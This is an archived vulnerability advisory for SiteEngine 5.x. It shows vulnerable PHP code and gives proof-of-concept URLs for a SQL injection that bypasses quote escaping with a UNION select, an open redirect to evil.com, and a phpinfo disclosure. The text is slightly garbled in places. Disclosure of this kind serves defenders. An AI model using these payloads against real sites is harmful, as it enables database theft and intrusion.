TUCoPS :: HP Unsorted S :: va1632.htm

SiteEngine 5.x Multiple Remote Vulnerabilities
SiteEngine 5.x Multiple Remote Vulnerabilities
SiteEngine 5.x Multiple Remote Vulnerabilities



Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability.

-=0x01=- SQL injection Vulnerability
vul code like this:
if ( intval( $id ) )
{
    require_once( $site_engine_root."lib/rss.php" );
$sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'";

POC:
http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,1 
1%20/*
This vulnerability exist in board.php=85=85

-=0x02=- URI Redirection Vulnerability 
POC:
http://www.test.com/api.php?action=logout&forward=http://evil.com 

-=0x02=- Information Disclosure Vulnerability 
POC:
http://www.test.com/misc.php?action=php_info 

ForFun~

-=EOF=-

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH